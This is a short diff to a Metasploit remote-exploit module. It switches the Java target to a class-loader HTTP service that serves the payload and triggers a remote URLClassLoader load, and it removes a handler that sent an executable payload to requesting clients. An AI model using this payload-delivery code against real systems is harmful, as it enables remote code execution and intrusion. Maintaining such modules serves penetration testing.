@@ -150,7 +150,7 @@ class MetasploitModule < Msf::Exploit::Remote
     case target['Type']
     when :java
       # Start the HTTP server to serve the payload
-      start_service
+      java_class_loader_start_service
       # Trigger a loadClass request via java.net.URLClassLoader
       trigger_urlclassloader
       # Handle the payload
@@ -285,17 +285,4 @@ class MetasploitModule < Msf::Exploit::Remote
     res
   end
 
-  # handle http requests from java stagers and cmd stagers differently
-  def on_request_uri(cli, request)
-    case target['Type']
-    when :java
-      super(cli, request)
-    else
-      client = cli.peerhost
-      print_status("Client #{client} requested #{request.uri}")
-      print_status("Sending payload to #{client}")
-      send_response(cli, exe)
-    end
-  end
-
 end
